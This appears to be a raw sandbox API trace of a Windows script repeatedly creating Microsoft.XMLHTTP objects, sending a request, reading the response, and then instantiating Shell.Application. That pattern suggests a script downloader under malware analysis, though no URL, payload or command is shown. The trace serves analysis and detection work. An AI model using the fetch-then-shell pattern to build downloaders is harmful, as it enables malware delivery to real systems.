	[0742.218] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.221] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.221] SysStringLen (param_1=0x0) returned 0x0
	[0742.221] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.221] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0742.221] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0742.222] ??2@YAPEAX_K@Z () returned 0x62f310
	[0742.222] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0742.222] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.222] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0742.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0742.222] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0742.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.222] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.222] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.222] SysStringLen (param_1=0x0) returned 0x0
	[0742.222] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.223] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0742.223] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0742.223] ??2@YAPEAX_K@Z () returned 0x62f330
	[0742.223] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0742.223] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.223] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0742.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0742.223] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0742.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.223] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.224] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.224] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.224] SysStringLen (param_1=0x0) returned 0x0
	[0742.224] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.224] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.224] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0742.224] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.224] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0742.224] ??2@YAPEAX_K@Z () returned 0x62f310
	[0742.224] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0742.224] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.224] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0742.224] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0742.225] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0742.225] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.225] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.225] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.225] longjmp () 
	[0742.225] longjmp () 
	[0742.225] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.225] SysStringLen (param_1=0x0) returned 0x0
	[0742.225] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.226] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0742.226] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0742.226] ??2@YAPEAX_K@Z () returned 0x62f330
	[0742.226] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.226] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0742.226] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.226] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.227] longjmp () 
	[0742.227] longjmp () 
	[0742.227] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.227] SysStringLen (param_1=0x0) returned 0x0
	[0742.227] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.227] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.227] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0742.227] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.227] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0742.227] ??2@YAPEAX_K@Z () returned 0x62f310
	[0742.227] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0742.227] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.228] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0742.228] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0742.228] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0742.228] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.228] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0742.228] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0742.228] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0742.228] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0742.228] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0745.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0745.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0745.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0745.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0745.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0745.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0745.300] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0745.300] SysStringLen (param_1=0x0) returned 0x0
	[0745.300] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0745.301] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
